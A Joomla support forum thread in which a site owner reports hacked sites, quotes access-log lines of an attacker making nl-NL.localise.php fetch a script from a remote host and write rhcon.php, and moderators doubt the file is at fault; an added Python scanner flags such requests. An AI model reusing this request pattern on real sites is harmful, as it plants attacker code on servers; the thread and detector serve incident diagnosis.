Support Forum


en-GB.localise.php


Hi,

Some of our websites were hacked in the last couple of weeks. It seems that the file en-GB.localise.php (or any other language.localise.php file) is being misused. This file was used in J1.7 (so I was told) and is now obsolete in newer versions of Joomla. But in your quickstarts the file is still there.

Might it be a good idea to remove this file? It would improve security.

Cheers,

Leonard
  • Leonard van der Plas
  • Lifetime Developer - Big Bamboo
  • 82 posts
  • 3 Thanks
  • Karma: 4
Hi Leonard,

I have just checked the core 2.5 and 3.x packages and this file is still part of Joomla in the latest downloads.

Do you have any information on how this file is hacked?
It looks to me like a few search functions and I couldn't find anything on the Joomla bug tracker.

Regards,

Rob
  • Robert Went
  • Moderator
  • 2210 posts
  • 196 Thanks
  • Karma: 90
Hi Leonard,

Talking to the team who know way more about this than me :)

That file is part of the Joomla core 2.5 and 3.0 packages

With that file in particular it's likely that this was just the file the hacker hacked and not due to a particular issue / flaw

Cheers
Paul
  • manh
  • Moderator
  • 45248 posts
  • 2106 Thanks
  • Karma: 603
Ah okay. I don't have much more info on this matter. I'm not that technical and for these kinds of things I totally rely on my hosting provider's support. My provider gave me the advice to remove the file as it was obsolete according to them... Their answer to my support question (I'll try to translate):
/language/nl-NL/nl-NL.localise.php is being misused to place the malicious script rhcon.php. This is a part of the logs:

[14/Aug/2013:01:52:12 +0200] "GET /language/nl-NL/nl-NL.localise.php?z=rhcon.php&id=http%3A%2F%2Fcassandra.is%2Ftmp%2Fr.txt HTTP/1.1" 200 2 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
[14/Aug/2013:01:52:12 +0200] "POST /language/nl-NL/rhcon.php HTTP/1.1" 200 69751 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"

This script is used in Joomla version 1.7 which is no longer supported. We advise you to upgrade
(the upgrade is what we had already done half a year ago)


I'm starting to think the tech support of my hosting provider isn't really up-to-date on this matter. Or maybe I just don't understand what they are saying.
  • Leonard van der Plas
  • Lifetime Developer - Big Bamboo
  • 82 posts
  • 3 Thanks
  • Karma: 4
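
The two log lines in the post above show a request to a .php file whose query string carries a bare .php file name and a remote URL, followed by a request to that file name in the same directory. As an added example (not part of the thread or of Joomla), this Python script flags that sequence in an access log; the Apache combined log format, the function name and the sample lines with placeholder hosts are assumptions, and a match shows only what was requested and answered, not which file was at fault.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Timestamp, method, request target and status of an Apache combined-format line.
LINE = re.compile(r'\[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) '
                  r'HTTP/[\d.]+" (?P<status>\d{3})')
REMOTE = ("http://", "https://", "ftp://")

def find_staged_uploads(lines):
    """Flag .php requests whose query carries both a remote URL and a bare
    .php file name, then note whether that file name is requested afterwards."""
    findings, pending = [], {}
    for line in lines:
        m = LINE.search(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        values = [v for _, v in parse_qsl(url.query)]  # percent-decoded values
        remote = [v for v in values if v.lower().startswith(REMOTE)]
        names = [v for v in values if v.lower().endswith(".php") and "/" not in v]
        if url.path.lower().endswith(".php") and remote and names:
            directory = url.path.rsplit("/", 1)[0]
            for name in names:
                hit = {"time": m["ts"], "via": url.path, "source": remote[0],
                       "dropped": f"{directory}/{name}", "followup_200": False}
                findings.append(hit)
                pending[hit["dropped"]] = hit
        elif url.path in pending and m["status"] == "200":
            # A 200 here means something answered at the staged path.
            pending[url.path]["followup_200"] = True
    return findings

# Constructed sample lines modelled on the log excerpt; hosts and IPs are placeholders.
SAMPLE = [
    '192.0.2.10 - - [14/Aug/2013:01:52:12 +0200] "GET /language/nl-NL/nl-NL.localise.php'
    '?z=rhcon.php&id=http%3A%2F%2Fhost.example%2Ftmp%2Fr.txt HTTP/1.1" 200 2 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [14/Aug/2013:01:52:12 +0200] "POST /language/nl-NL/rhcon.php HTTP/1.1" '
    '200 69751 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [14/Aug/2013:01:53:40 +0200] "GET /index.php?option=com_content&id=5 '
    'HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [14/Aug/2013:01:54:02 +0200] "GET /index.php'
    '?return=http%3A%2F%2Fsite.example%2F HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_staged_uploads(SAMPLE):
        print(hit)
```

A finding with `followup_200` set is a reason to look for the named file on disk and compare the install against a clean copy of the same Joomla release.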
Hi Leonard,

I think this is probably over my head but the file contains this line that should stop it from being called directly before any of the code that follows it can be accessed:
defined('_JEXEC') or die;

So to run any malicious code there must already be php files on the account which define _JEXEC (which also doesn't make sense as they would then be able to write files directly without having to use other scripts).

The actual logs might just be showing an attempted hack before it found another vulnerable file on the system.

I'm no security expert though so it's just a guess.

Rob
  • Robert Went
  • Moderator
  • 2210 posts
  • 196 Thanks
  • Karma: 90
The following user(s) said Thank You: Leonard van der Plas
